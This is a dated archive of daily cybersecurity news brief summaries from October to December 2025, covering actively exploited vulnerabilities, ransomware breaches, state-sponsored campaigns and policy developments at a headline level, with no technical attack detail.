This cybersecurity brief for December 8, 2025, covers a period of intense activity, headlined by the mass exploitation of 'React2Shell' (CVE-2025-55182), a critical 10.0 CVSS RCE vulnerability in React Server Components targeted by Chinese APTs. Other major events include Google's patch for two actively exploited Android zero-days, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and significant data breaches at universities and financial service providers linked to Cl0p and Akira ransomware gangs. The landscape is further defined by new malware threats like the BRICKSTORM backdoor and Albiriox Android trojan, and a White House executive order accelerating the transition to post-quantum cryptography.

Dec 7, 2025 · 5 articles

React2Shell Exploitation Surges as CISA Adds to KEV; Clop Hits NHS via Oracle Zero-Day

This cybersecurity brief for December 7, 2025, covers a critical period marked by the widespread, active exploitation of the React2Shell vulnerability (CVE-2025-55182), prompting its addition to CISA's KEV catalog. State-sponsored actors and cybercriminals are leveraging the flaw for broad attacks. Concurrently, the Clop ransomware group executed a significant data breach against the UK's Barts Health NHS Trust by exploiting an Oracle zero-day. Other major developments include the discovery of long-running supply chain attacks in Go and Rust package registries, a joint US-Canada warning about Chinese 'Brickstorm' malware targeting VMware, and a no-click vulnerability in WhatsApp leading to account takeovers. These events underscore the increasing sophistication of threats against software supply chains, critical infrastructure, and widely used applications.

Dec 6, 2025 · 7 articles

React2Shell Zero-Day Exploited by Chinese APTs, Triggers Global Cloudflare Outage; FinCEN Reports Ransomware Payments Top $2.1B

This cybersecurity brief for December 6, 2025, covers a critical 24-hour period dominated by the active exploitation of the React2Shell vulnerability (CVE-2025-55182). Chinese state-sponsored actors weaponized the CVSS 10.0 flaw within hours, prompting CISA to add it to the KEV catalog. The rush to mitigate the threat inadvertently caused a major global outage at Cloudflare. Concurrently, a new FinCEN report revealed ransomware payments have surpassed $2.1 billion in three years, highlighting the persistent financial drain of cybercrime. Other significant developments include the emergence of the Benzona ransomware, the Albiriox Android RAT, and a new cybercrime supergroup, 'Scattered LAPSUS$ Hunters,' threatening Salesforce data.

Dec 5, 2025 · 4 articles

Critical 'React2Shell' RCE Exploited by Chinese Hackers; Google Patches Android Zero-Days

This cybersecurity brief for December 5, 2025, covers a critical 10.0 CVSS vulnerability dubbed 'React2Shell' (CVE-2025-55182) being actively exploited by Chinese state-sponsored actors just hours after disclosure. Other major incidents include Google patching two actively exploited Android zero-days, a joint US-Canada alert on new 'BRICKSTORM' malware targeting VMware, and the Clop ransomware group breaching a major UK NHS trust.

Dec 4, 2025 · 5 articles

Critical 'React2Shell' RCE Threatens Web Ecosystem as CISA Warns of Chinese 'BRICKSTORM' Malware Targeting Governments

This cybersecurity brief for December 4, 2025, covers a critical 10.0 CVSS RCE vulnerability, 'React2Shell' (CVE-2025-55182), affecting React and Next.js, now under active exploitation. Concurrently, a joint advisory from CISA, NSA, and Canada's Cyber Centre details the sophisticated 'BRICKSTORM' backdoor used by PRC state-sponsored actors against government and IT sectors. Other major developments include CISA adding actively exploited Android and SCADA vulnerabilities to its KEV catalog, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and a significant data breach disclosure from Freedom Mobile.

Dec 3, 2025 · 7 articles

Android Zero-Days & Critical React RCE Exploited in Wild; Coupang Breach Hits 34M

This cybersecurity brief for December 3, 2025, covers a series of critical incidents, including the active exploitation of two Android zero-day vulnerabilities and a CVSS 10.0 RCE flaw in React and Next.js. A massive data breach at South Korean e-commerce giant Coupang exposed the data of nearly 34 million customers due to a compromised employee key. Other major developments include a supply-chain attack on the SmartTube app, new stealthy tactics from Iranian APT MuddyWater, a shift to data extortion by ransomware groups targeting manufacturing, and significant policy updates from the G7 and EU.

Dec 2, 2025 · 5 articles

Massive Data Breaches, Android Zero-Days, and APT Activity Mark a Turbulent Start to December

This cybersecurity brief for December 2, 2025, covers a series of high-impact incidents. Key stories include a supply chain attack on the popular SmartTube app for Android TV, a monumental data breach at South Korean e-commerce giant Coupang affecting 33.7 million users, and Google's emergency patch for two actively exploited Android zero-day vulnerabilities. Additionally, law enforcement dismantled a major crypto-laundering service, and new campaigns from Iranian and North Korean APT groups targeting critical infrastructure and financial sectors have been detailed.

Dec 1, 2025 · 7 articles

Coupang Data Breach Exposes 33.7M Users; Google Patches Actively Exploited Android Zero-Days

This cybersecurity brief for December 1, 2025, covers several critical incidents. The most prominent is a massive data breach at South Korean e-commerce giant Coupang, affecting 33.7 million users due to an authentication vulnerability. Concurrently, Google released an urgent Android update patching 107 flaws, including two zero-days under active exploitation. Other major events include the release of a proof-of-concept for a critical zero-click Outlook RCE, ongoing supply chain attacks from the Shai-Hulud 2.0 worm, and new intelligence on APT groups like Tomiris and those targeting industrial sectors.

Nov 30, 2025 · 7 articles

Supply Chain Under Siege: Malicious VS Code Extension, APT36 Linux Malware, and Major Data Breaches Rattle Global Industries

This cybersecurity brief for November 29-30, 2025, covers a series of high-impact incidents, led by the discovery of a malicious Visual Studio Code extension that infected over 16,000 developers using a sophisticated Solana blockchain-based C2. Concurrently, the APT36 threat actor escalated its cyber-espionage efforts by deploying custom Linux malware against Indian government entities. The period also saw major data breaches, including the exposure of Amazon data center blueprints from a steel contractor and the theft of 6.1 million Netmarble user records. In the financial sector, a DeFi exploit drained $9 million from Yearn Finance, while regulatory actions saw Comcast fined $1.5 million for a vendor-related breach, underscoring the pervasive risk across software development, government, and corporate supply chains.

Nov 29, 2025 · 8 articles

Qilin Ransomware Strikes Globally: Asahi and South Korean Financial Sector Hit in Major Campaigns

This cybersecurity brief for November 29, 2025, covers a series of high-impact attacks led by the Qilin ransomware group, including a massive data breach at Japanese beverage giant Asahi affecting nearly 2 million individuals and a sophisticated supply-chain attack that compromised 28 South Korean financial firms. Additional major events include espionage campaigns by APT groups Bloody Wolf and APT36, data breaches at Under Armour and DoorDash, and a cloud misconfiguration incident at Oracle. The period was marked by significant ransomware activity, nation-state espionage, and supply chain vulnerabilities.

Nov 28, 2025 · 9 articles

Supply Chain Attacks Surge as North Korean Hackers Flood NPM; CISA Issues Urgent Mobile & ICS Alerts

This cybersecurity advisory for November 27-28, 2025, highlights a significant escalation in software supply chain attacks, underscored by a North Korean campaign that flooded the NPM registry with nearly 200 malicious packages. Concurrently, CISA has issued critical warnings, adding an exploited ICS vulnerability (CVE-2021-26829) to its KEV catalog and releasing urgent guidance for mobile device security against commercial spyware. Other major incidents include a data breach at the French Football Federation exposing player information, a massive leak of over 17,000 secrets on public GitLab repositories, and evolving tactics from APT groups like Bloody Wolf and Tomiris targeting government entities across Central Asia.

Nov 27, 2025 · 8 articles

Ransomware Cripples US Emergency Alerts and London Councils; Critical Flaws in Azure and Oracle Under Active Attack

This cybersecurity brief for November 26-27, 2025, covers a series of high-impact ransomware attacks and critical vulnerability disclosures. The Inc Ransom group disrupted the CodeRED emergency alert system across the U.S., while a separate attack crippled services for three London councils. The Akira ransomware gang claimed attacks on five North American firms. Concurrently, CISA issued warnings for actively exploited vulnerabilities in Oracle Identity Manager (CVE-2025-61757) and spyware targeting messaging apps. A critical CVSS 10.0 authentication bypass flaw (CVE-2025-49752) was also discovered in Microsoft's Azure Bastion service, highlighting significant risks in both public infrastructure and cloud environments.

Nov 26, 2025 · 6 articles

CodeRED Emergency Alerts Downed by Ransomware; Major Banks Hit in Supply Chain Breach; Russia & North Korea APTs Collaborate

This cybersecurity brief for November 26, 2025, covers several critical incidents. A ransomware attack by the 'Inc Ransom' group has crippled the OnSolve CodeRED emergency alert system across the U.S., disrupting a vital public safety tool. In a major supply chain breach, financial tech vendor SitusAMC exposed sensitive data from top banks like JPMorgan Chase and Citi. Security researchers uncovered an unprecedented collaboration between Russian (Gamaredon) and North Korean (Lazarus) state-sponsored hacking groups using shared infrastructure. Additionally, a new, more destructive version of the 'Shai-Hulud' npm worm is causing widespread compromise, and CISA has issued warnings about spyware targeting Signal/WhatsApp users and multiple vulnerabilities in industrial control systems.

Nov 25, 2025 · 6 articles

Massive 'Sha1-Hulud' Supply Chain Attack Compromises 25,000+ GitHub Repos; CISA Warns of Multiple Actively Exploited Zero-Days

This intelligence briefing for November 25, 2025, covers a massive software supply chain attack named 'Sha1-Hulud' that has compromised over 25,000 GitHub repositories via malicious npm packages. Additionally, CISA has issued directives for actively exploited zero-day vulnerabilities in Oracle Identity Manager, Google Chrome, and Fortinet's FortiWeb. Other major threats include the Akira ransomware group targeting M&A activities, a surge in Black Friday phishing scams, and a data breach at a major banking vendor, SitusAMC.

Nov 24, 2025 · 2 articles

Supply Chain Attacks Cripple NPM and Salesforce; FCC Rolls Back ISP Security Rules

This 24-hour period saw a surge in high-impact supply chain attacks, with the 'Shai-Hulud' worm infecting hundreds of NPM packages and a breach at Gainsight exposing Salesforce customer data. Concurrently, a major cyberattack hit a key US mortgage vendor, and the FCC controversially rescinded ISP cybersecurity rules amidst ongoing nation-state threats. Ransomware and espionage campaigns also continue, with Akira hitting LG and a new APT, 'Autumn Dragon,' targeting Southeast Asia.

Nov 23, 2025 · 8 articles

Zero-Day Exploits Rock Oracle and Chrome; APTs Uncovered in Multi-Year Espionage Campaigns

This cybersecurity brief for November 23, 2025, covers a tumultuous period marked by the active exploitation of zero-day vulnerabilities in Oracle E-Business Suite by the Cl0p ransomware gang and in Google Chrome. Concurrently, researchers have exposed long-running cyberespionage campaigns by APT24 and APT31, which utilized sophisticated supply chain attacks and cloud-based C2 infrastructure. Other major incidents include a record-breaking 15.72 Tbps DDoS attack mitigated by Microsoft, a critical CVSS 10.0 vulnerability in Grafana Enterprise, and a series of data breaches impacting Harvard University, CrowdStrike, and Salesforce customers via a supply chain attack on Gainsight.

Nov 22, 2025 · 3 articles

Massive Supply Chain Attack Hits Salesforce Ecosystem; Critical Flaws in Oracle, Azure, and Grafana Emerge

This cybersecurity brief for November 22, 2025, covers a series of high-impact events. A major supply chain attack attributed to 'Scattered Lapsus$ Hunters' compromised over 200 companies by abusing OAuth tokens in a Salesforce-integrated app. Concurrently, CISA issued warnings for a critical, actively exploited RCE in Oracle Identity Manager. Critical 10.0 CVSS vulnerabilities were also disclosed in Microsoft Azure Bastion and Grafana Enterprise. Other significant threats include a new Android trojan stealing encrypted messages, a sophisticated Chinese APT campaign targeting Russia, and a botnet using the Ethereum blockchain for C2.

Nov 21, 2025 · 6 articles

ShinyHunters Breaches Salesforce Ecosystem via Gainsight; SEC Drops Landmark SolarWinds Lawsuit

This cybersecurity brief for November 20-21, 2025, covers major incidents including a ShinyHunters-led supply chain attack on Salesforce customers via the Gainsight app, the SEC's surprising dismissal of its lawsuit against SolarWinds and its CISO, and Microsoft's patching of an actively exploited Windows Kernel zero-day. Other key developments include a new SANS report on rising OT/ICS threats, the INC ransomware group targeting a Burj Khalifa fire-safety provider, and new cybersecurity regulations proposed in the UK.

Nov 20, 2025 · 5 articles

CISA Mandates Urgent Patching for Actively Exploited Fortinet, Chrome, and Windows Zero-Days

This cybersecurity brief for November 20, 2025, covers a series of critical zero-day vulnerabilities under active exploitation, prompting emergency directives from CISA. Key advisories include a Fortinet FortiWeb command injection flaw (CVE-2025-58034), a Windows Kernel privilege escalation bug (CVE-2025-62215), and a Google Chrome RCE vulnerability (CVE-2025-13223), all added to the KEV catalog. Additionally, this report details ransomware attacks by the 'sinobi' and 'Inc Ransom' groups, new CISA guidance on bulletproof hosting and drone threats, and research on the surge in AI-driven cyberattacks and a new macOS infostealer.

Nov 19, 2025 · 6 articles

Google Patches Actively Exploited Chrome Zero-Day as Ransomware Cripples PA Attorney General's Office

This cybersecurity brief for November 19, 2025, covers a critical period marked by urgent zero-day patching and high-stakes ransomware attacks. Google rushed to fix the seventh actively exploited Chrome zero-day of the year (CVE-2025-13223), a type confusion bug in the V8 engine. Concurrently, the Pennsylvania Attorney General's office confirmed a major data breach by the Inc Ransom group, who exploited a Citrix vulnerability to exfiltrate 5.7 TB of sensitive data. Other significant events include CISA adding a Fortinet FortiWeb flaw to its KEV catalog, international sanctions against a Russian bulletproof hosting network, and multiple data breaches affecting DoorDash and healthcare providers due to phishing and supply chain weaknesses.

Nov 18, 2025 · 8 articles

AI-Orchestrated Cyber Espionage Uncovered; Logitech Breached by Clop; Google Patches Actively Exploited Chrome Zero-Day

This intelligence brief for November 18, 2025, covers a landmark AI-driven espionage campaign by a Chinese state actor, a major data breach at Logitech by the Clop ransomware gang exploiting an Oracle zero-day, and an emergency patch from Google for an actively exploited Chrome vulnerability. Additional reports detail critical flaws in WordPress plugins, a defacement attack on Kenyan government websites, and a massive DDoS attack on critical infrastructure.

Nov 17, 2025 · 6 articles

Jaguar Land Rover Reels from £680M Cyberattack Loss; Cl0p Exploits Oracle Zero-Day in Massive Campaign

This intelligence brief for November 16-17, 2025, covers a series of high-impact cyber events. Key incidents include Jaguar Land Rover's staggering £680 million loss from a production-halting cyberattack, a widespread campaign by the Cl0p ransomware gang exploiting an Oracle E-Business Suite zero-day to breach Logitech and others, and the introduction of a sweeping new cybersecurity bill in the UK. Other major events include the discovery of 150,000 malicious NPM packages in a crypto-farming scheme, an actively exploited Windows Kernel zero-day patch from Microsoft, and multiple data breaches affecting DoorDash and Eurofiber.

Nov 16, 2025 · 6 articles

CISA Warns of Actively Exploited Fortinet Zero-Day; FBI Details Akira Ransomware's $250M Spree

In cybersecurity news for November 15-16, 2025, the landscape is dominated by the active exploitation of a critical zero-day vulnerability (CVE-2025-64446) in Fortinet's FortiWeb WAF, prompting an emergency directive from CISA. Concurrently, the FBI and CISA issued a stark warning about the Akira ransomware gang, which has extorted nearly $250 million from critical infrastructure sectors by exploiting VPNs. Other major developments include the discovery of an APT using two zero-days against Cisco and Citrix systems, a proposed overhaul of UK cybersecurity law, and a documented 30% surge in ransomware attacks in October, highlighting the rise of new groups like Qilin and Sinobi.

Nov 15, 2025 · 7 articles

Akira Ransomware Escalates Attacks as Flurry of Zero-Days Hits Microsoft, Fortinet, and Cisco

For the period of November 14-15, 2025, the cybersecurity landscape was dominated by the escalating threat of the Akira ransomware group, which has now extorted over $244 million and is actively targeting critical infrastructure with new exploits. Simultaneously, a wave of critical, actively exploited zero-day vulnerabilities impacted major enterprise vendors including Microsoft, Fortinet, and Cisco, prompting urgent patching directives from CISA. Other significant developments include a state-sponsored campaign weaponizing AI for espionage, an unverified but high-impact claim by the Clop gang against the UK's NHS, and a massive supply chain attack flooding the NPM registry with over 150,000 malicious packages for a novel token-farming scheme.

Nov 14, 2025 · 6 articles

Global Cybercrime Disrupted by 'Operation Endgame'; Cl0p Breaches Entrust with Oracle Zero-Day

This reporting period for November 14, 2025, is dominated by major law enforcement actions and high-stakes cyberattacks. A global coalition led by Europol executed 'Operation Endgame,' dismantling over 1,000 servers tied to prolific malware families. Concurrently, the Cl0p ransomware group exploited a critical Oracle zero-day to breach security firm Entrust. Microsoft also patched an actively exploited Windows Kernel zero-day, while CISA issued an updated warning on the evolving Akira ransomware, which now targets Nutanix virtual machines.

Nov 13, 2025 · 8 articles

Microsoft Patches Actively Exploited Windows Zero-Day as Global Law Enforcement Dismantles Major Cybercrime Rings

In a critical 24-hour period ending November 13, 2025, the cybersecurity landscape was dominated by Microsoft's emergency patch for an actively exploited Windows Kernel zero-day (CVE-2025-62215) and a major international law enforcement action, 'Operation Endgame,' which dismantled the infrastructure of several malware-as-a-service operations. Other significant events include the discovery of an APT exploiting Cisco and Citrix zero-days, the introduction of a sweeping new cyber resilience bill in the UK, and CISA's addition of newly exploited vulnerabilities to its KEV catalog.

Nov 12, 2025 · 6 articles

Microsoft Patches Actively Exploited Windows Zero-Day; Advanced Actors Target Cisco and Citrix in New Campaigns

In cybersecurity news for November 12, 2025, Microsoft has released its November Patch Tuesday update, addressing a critical Windows Kernel zero-day (CVE-2025-62215) under active exploitation. Concurrently, Amazon's threat intelligence team revealed that an advanced threat actor is exploiting new zero-days in Cisco ISE and Citrix NetScaler. Major developments also include a sweeping new cybersecurity bill in the UK, a crippling ransomware attack on Asahi Breweries in Japan, and the Clop ransomware gang claiming an attack on Dartmouth College. Other significant events involve a large-scale phishing campaign abusing Facebook's infrastructure and new NYDFS compliance deadlines taking effect.

Nov 11, 2025 · 6 articles

Triofox Zero-Day Exploited In-the-Wild; CMMC Enforcement Begins for DoD Contractors

This cybersecurity brief for November 11, 2025, covers several critical developments. A zero-day in Gladinet's Triofox (CVE-2025-12480) is being actively exploited for remote code execution. CISA added a zero-click Samsung mobile flaw (CVE-2025-21042) to its KEV catalog following active exploitation. The DoD has officially begun CMMC enforcement for its contractors. Other major incidents include a destructive campaign by the KONNI APT against Android users, and significant data breaches at Nikkei and Hyundai AutoEver.

Nov 10, 2025 · 6 articles

China's Cyber Arsenal Exposed in Massive Leak; Critical Flaws Threaten QNAP, Docker, and Kubernetes

This cybersecurity brief for November 10, 2025, covers a series of high-impact events. A catastrophic data breach at Chinese firm Knownsec has exposed state-sponsored hacking tools and global target lists. Concurrently, critical zero-day vulnerabilities are forcing urgent patches for QNAP NAS devices and the runC container runtime, which underpins Docker and Kubernetes. Other major incidents include a significant data breach affecting 1.5 million Swedes, a cyberattack on the U.S. Congressional Budget Office, and new regulatory rollouts from the DoD and guidance from the OWASP Foundation.

Nov 9, 2025 · 7 articles

Clop Ransomware Breaches Washington Post; Critical Flaws Found in Docker, QNAP, and AI Models

This cybersecurity brief for November 9, 2025, covers a series of high-impact events. The Clop ransomware group has been confirmed as the perpetrator behind a major breach at The Washington Post, exploiting Oracle E-Business Suite vulnerabilities in a campaign affecting over 100 organizations. Concurrently, Microsoft revealed a novel 'Whisper Leak' side-channel attack capable of inferring AI chat topics from encrypted traffic. Critical vulnerabilities have also emerged, with the GlassWorm malware resurfacing in the VSCode marketplace, QNAP patching seven zero-days from Pwn2Own, and newly disclosed flaws in the runC container runtime threatening Docker and Kubernetes environments. These incidents highlight escalating threats across enterprise software, AI platforms, and cloud infrastructure.

Nov 8, 2025 · 7 articles

Samsung Zero-Day Exploited by LANDFALL Spyware; Sandworm Escalates Destructive Attacks on Ukraine

This cybersecurity publication for November 8, 2025, covers a critical period marked by sophisticated mobile espionage, escalating nation-state attacks, and a record surge in supply chain compromises. Key stories include the discovery of the LANDFALL spyware using a Samsung zero-day for zero-click attacks in the Middle East, a new report detailing Russia's Sandworm group intensifying destructive wiper attacks against Ukraine's critical infrastructure, and data showing software supply chain attacks hit an all-time high in October, driven by ransomware gangs like Qilin.

Nov 7, 2025 (7 articles)

Cisco Firewalls Under Siege by New DoS Attacks; AI Supercharges Ransomware Campaigns

In the period covering November 6-7, 2025, the cybersecurity landscape was dominated by new attack variants targeting critical Cisco firewall vulnerabilities, causing persistent denial-of-service conditions. Concurrently, reports emerged detailing how threat actors are leveraging AI to drastically shorten ransomware attack timelines, with Europe becoming a primary target. Other major developments include a sophisticated global phishing campaign against Booking.com users, the discovery of Android spyware delivered via a Samsung zero-day, and a record-breaking month for software supply chain attacks driven by ransomware groups like Qilin and Akira.

Nov 6, 2025 (7 articles)

AI-Powered Malware Emerges as Critical Zero-Click Flaw Hits Billions of Android Devices

This cybersecurity brief for November 6, 2025, covers a landmark shift in the threat landscape with Google's discovery of AI-powered malware like PROMPTFLUX, which uses LLMs to mutate its own code. Concurrently, a critical zero-click RCE vulnerability (CVE-2025-48593) was disclosed for Android versions 13-16, posing a severe risk to billions of users. Other major incidents include the Qilin ransomware gang's claimed breach of Habib Bank AG Zurich, a cyberattack on the U.S. Congressional Budget Office, and a supply chain attack by Cl0p impacting The Washington Post via an Oracle zero-day.

Nov 5, 2025 (7 articles)

Critical Infrastructure Under Fire: CISA Warns of Major ICS Flaws, State-Sponsor Breaches F5 BIG-IP

This cybersecurity brief for November 5, 2025, covers a series of high-stakes threats targeting critical infrastructure and enterprise security. CISA has disclosed severe vulnerabilities in industrial control systems from five vendors, while a state-sponsored actor has breached F5, compromising its BIG-IP source code and creating a significant supply chain risk. Other major developments include the evolution of the DragonForce ransomware group into a 'cartel' with ties to Scattered Spider, the indictment of cybersecurity insiders for deploying BlackCat ransomware, and a massive data breach at a Swedish IT firm exposing 1.5 million individuals' data. These events underscore the growing threats to OT environments, the sophistication of ransomware actors, and the persistent danger of insider threats and cloud misconfigurations.

Nov 4, 2025 (6 articles)

Insider Threats, Zero-Days, and Ransomware Shake Global Cybersecurity Landscape

This 24-hour cybersecurity brief for November 4, 2025, covers critical developments including the indictment of cybersecurity professionals for running a BlackCat ransomware ring, a severe zero-click RCE in Android, and a new Cl0p campaign exploiting an Oracle zero-day. Reports also highlight the emergence of the Conti-derived DragonForce ransomware and the massive financial fallout for SK Telecom after a major data breach.

Nov 3, 2025 (5 articles)

Chinese APT 'Airstalk' Malware Targets BPO Supply Chains; Insider Threats and Cl0p Zero-Day Exploits Escalate

This cybersecurity brief for November 3rd, 2025, covers a surge in sophisticated threats. Key developments include the discovery of 'Airstalk,' a new Chinese APT malware using MDM APIs for C2 in supply chain attacks against the BPO sector. In a shocking insider threat case, cybersecurity professionals were indicted for using ALPHV/BlackCat ransomware. The Cl0p ransomware group is actively exploiting an Oracle zero-day (CVE-2025-61882), while an unpatched Windows LNK flaw (CVE-2025-9491) continues to be leveraged by APTs. Additionally, new reports highlight advanced phishing on LinkedIn, the massive financial fallout from the SK Telecom breach, and escalating ransomware attacks across Europe.

Nov 2, 2025 (7 articles)

Penn Breach Exposes 1.2M Records; Critical Android Zero-Click & Chinese APTs Target Zero-Days

This cybersecurity brief for November 2nd, 2025, covers a series of high-impact security incidents. A massive data breach at the University of Pennsylvania has allegedly exposed 1.2 million donor records. Google has issued an urgent patch for a critical zero-click RCE vulnerability in Android. Meanwhile, Chinese state-sponsored threat actors, including Bronze Butler and UNC6384, are actively exploiting zero-day vulnerabilities in Lanscope and Windows systems to deploy malware and spy on targets in Europe and Asia. Other significant events include a major data breach at a Polish loan company and an Australian government warning about new malware targeting Cisco devices.

Nov 1, 2025 (8 articles)

China-Linked Actors Exploit Windows & VMware Zero-Days; Ransomware Gangs Hit Major Corporations

This cybersecurity brief for November 1, 2025, covers a surge in state-sponsored cyber-espionage and critical zero-day exploitation. Chinese-linked threat actors are actively leveraging an unpatched Windows vulnerability (CVE-2025-9491) to spy on European diplomats and a now-patched VMware flaw (CVE-2025-41244) for privilege escalation. Concurrently, ransomware remains a dominant threat, with the Akira group claiming a breach at Apache OpenOffice, RansomHouse hitting Japanese retailer Askul, and a massive data breach at Conduent affecting over 10.5 million individuals. Other significant developments include the discovery of new malware families 'KYBER' and 'Airstalk', a supply chain attack on the npm registry, and an ongoing campaign targeting Cisco devices in Australia.

Oct 31, 2025 (7 articles)

PhantomRaven Supply Chain Attack Hits npm; Conduent Breach Exposes 10.5M; CISA Flags Actively Exploited Flaws

This cybersecurity brief for October 31, 2025, covers a surge in sophisticated threats. Highlights include the 'PhantomRaven' supply chain attack on npm using novel evasion techniques, a massive data breach at Conduent affecting 10.5 million individuals, and CISA adding critical, actively exploited vulnerabilities in XWiki and VMware to its KEV catalog. Other major incidents include a prolonged nation-state breach at a key telecom provider, a significant Azure outage, and escalating ransomware campaigns from the Qilin group.

Oct 30, 2025 (7 articles)

Microsoft Azure Outage Causes Global Chaos; CISA Warns of Actively Exploited WSUS Flaw

This cybersecurity brief for October 30, 2025, covers a widespread Microsoft Azure outage triggered by a configuration error, a critical CISA alert for an actively exploited Windows Server vulnerability (CVE-2025-59287), and massive data breaches at government contractor Conduent and consulting giant EY. New threats include the 'Herodotus' Android malware and the 'logins[.]zip' infostealer, while the UK government considers a ransomware payment ban in response to escalating attacks.

Oct 29, 2025 (6 articles)

Urgent WSUS Patch Mandated Amidst Wave of Zero-Day Exploits Targeting Oracle, Chrome, and AI Agents

This cybersecurity brief for October 29, 2025, covers a series of critical threats, led by an urgent CISA directive to patch an actively exploited, wormable RCE vulnerability in Windows Server Update Services (CVE-2025-59287). The threat landscape is further defined by major zero-day attacks, with the FIN11/Clop ransomware group targeting Oracle EBS systems at industrial giants, and the 'Mem3nt0 mori' APT exploiting a Chrome zero-day. New malware strains have also emerged, including 'Airstalk' in a suspected nation-state supply chain attack and 'Herodotus', an Android trojan that mimics human behavior. Additionally, a report highlights the destructive impact of the 'Scattered Spider' group and a massive surge in AI-powered vishing attacks.

Oct 28, 2025 (7 articles)

Actively Exploited WSUS Flaw Triggers Emergency Patch; Qilin Ransomware Becomes 2025's Top Threat

This cybersecurity brief for October 28, 2025, covers several critical developments. Microsoft is scrambling to contain an actively exploited RCE vulnerability in WSUS (CVE-2025-59287) after a botched patch, forcing an emergency update. In the ransomware landscape, the Qilin group has surged to become the most prolific threat of 2025 with over 700 attacks, while payment rates have hit a record low. Other major incidents include a data breach at Sweden's power grid operator claimed by the Everest gang, a massive leak of 4.8 million patient records from Kenya's M-TIBA health platform, and new CISA alerts for critical flaws in industrial control systems and endpoint management software.

Oct 27, 2025 (10 articles)

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw as Qilin Ransomware Surges

In cybersecurity news for October 27, 2025, Microsoft issued an emergency patch for a critical, actively exploited remote code execution vulnerability in Windows Server Update Services (WSUS). Concurrently, reports indicate the Qilin ransomware group has become the most prolific operator of 2025, claiming over 700 victims. Other major incidents include a massive China-linked smishing campaign using over 194,000 domains, active exploitation of a critical flaw in Adobe Commerce, and a series of data breaches affecting the retail and healthcare sectors.

Oct 26, 2025 (6 articles)

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw; Dublin Airport Breach Hits 3.8M

This cybersecurity brief for October 26, 2025, covers several critical global incidents. A severe, actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency out-of-band patch, with CISA mandating immediate action. In a massive supply chain attack, Dublin Airport disclosed a data breach affecting 3.8 million passengers after a third-party provider, Collins Aerospace, was compromised by ransomware. Meanwhile, a DDoS attack on Russia's food safety agency crippled national supply chains, the Safepay ransomware group targeted a German video surveillance firm, and dozens of nations signed a landmark, albeit controversial, UN cybercrime treaty in Hanoi.

Oct 25, 2025 (2 articles)

CISA Issues Emergency Directive for Actively Exploited Microsoft WSUS Flaw; Ransomware Surges 50% in 2025

This cybersecurity brief for October 25, 2025, covers critical developments, led by an emergency CISA directive for an actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's Windows Server Update Service (WSUS). Other major stories include Microsoft's massive October Patch Tuesday fixing 193 flaws and six zero-days, a reported 50% surge in ransomware attacks in 2025 driven by new groups like Qilin, the resurgence of the LockBit ransomware gang with a new 'LockBit 5.0' variant, and a massive 'Smishing Triad' campaign using over 194,000 malicious domains. Global policy shifts are also noted, with the UK and Singapore launching a supply chain security initiative and the UN finalizing its Convention against Cybercrime.

Oct 24, 2025 (8 articles)

Critical WSUS Zero-Day Exploited, Prosper Breach Hits 17.6M, and Iranian APT Deploys 'Phoenix' Backdoor

This reporting period, October 23-24, 2025, has been marked by significant and active threats. A critical, actively exploited zero-day vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency patch and a CISA KEV alert, posing a severe risk to enterprise networks. In the financial sector, a massive data breach at Prosper Marketplace has exposed the highly sensitive personal and financial data of 17.6 million users. Concurrently, nation-state activity surged with an Iranian-linked APT group targeting over 100 government institutions globally using a new 'Phoenix' backdoor. Other major incidents include Google patching its sixth actively exploited Chrome zero-day of the year and multiple high-impact ransomware attacks affecting manufacturing, education, and critical infrastructure sectors.

Oct 23, 2025 (10 articles)

Ransomware Automation Slashes Attack Times to Minutes; Supply Chain Overconfidence Creates Massive Risk

In cybersecurity news for October 23, 2025, the threat landscape is defined by escalating speed and systemic risk. A new report reveals ransomware groups are using automation to compress attack timelines to just 18 minutes from initial access to lateral movement. Simultaneously, another study highlights a dangerous overconfidence in supply chain security, with 94% of firms feeling prepared despite a third failing to conduct basic supplier risk assessments. This is underscored by the staggering £1.9 billion economic cost of the Jaguar Land Rover hack, which cascaded through 5,000 supply chain organizations. Regulators are responding, with New York's DFS issuing new guidance on third-party risk. Meanwhile, CISA has added another actively exploited vulnerability to its KEV catalog, demanding immediate action from federal agencies.

Oct 22, 2025 (7 articles)

Ransomware Surges, JLR Hack Costs UK £1.9B, and 'GlassWorm' Hits Developers in Widespread Attacks

This cybersecurity advisory for October 21-22, 2025, covers a dramatic 34% surge in ransomware attacks against global critical infrastructure, with the U.S. being the top target. A separate analysis reveals the staggering economic fallout of a cyberattack on Jaguar Land Rover, costing the UK economy an estimated £1.9 billion. A sophisticated new worm, 'GlassWorm', is spreading through the VS Code ecosystem using invisible code to infect developers. Additionally, critical vulnerabilities have been disclosed in the Netty Java library and Oracle's E-Business Suite, while the UK government issues an urgent call for businesses to bolster defenses.

Oct 21, 2025 (4 articles)

Citrix Zero-Day Hits US Gov; APTs & Sophisticated Malware Campaigns Surge Globally

This intelligence brief for October 21, 2025, covers a series of high-impact cybersecurity events. A critical Citrix zero-day, 'CitrixBleed 2.0', led to a major data breach at the U.S. Department of Homeland Security, exposing employee data. Nation-state activity remains high, with China-linked Salt Typhoon targeting European telecoms and Russia-linked COLDRIVER rapidly deploying new malware after public disclosure. A novel supply chain attack, 'GlassWorm', is targeting VS Code developers using advanced obfuscation and a blockchain-based C2. Meanwhile, new reports highlight a 34% surge in ransomware attacks on critical infrastructure and the growing challenge of AI-powered cyberattacks outpacing organizational defenses.

Oct 20, 2025 (8 articles)

CISA Mandates Patches for Exploited Flaws; Nation-State Actors Breach F5 and Prosper Suffers Massive Data Leak

This cybersecurity brief for October 20, 2025, covers a series of high-impact events. CISA has added five actively exploited vulnerabilities to its KEV catalog, mandating urgent patching. In a significant supply-chain threat, a nation-state actor breached F5, stealing BIG-IP source code. Meanwhile, the Prosper lending platform disclosed a massive data breach affecting 17.6 million users, and the Cl0p ransomware gang is exploiting a new zero-day in Oracle E-Business Suite. These incidents highlight escalating threats across patch management, supply chain security, and data protection.

Oct 19, 2025 (9 articles)

Europol Busts 'SIMCARTEL' CaaS Network; Everest Ransomware Claims Collins Aerospace Attack

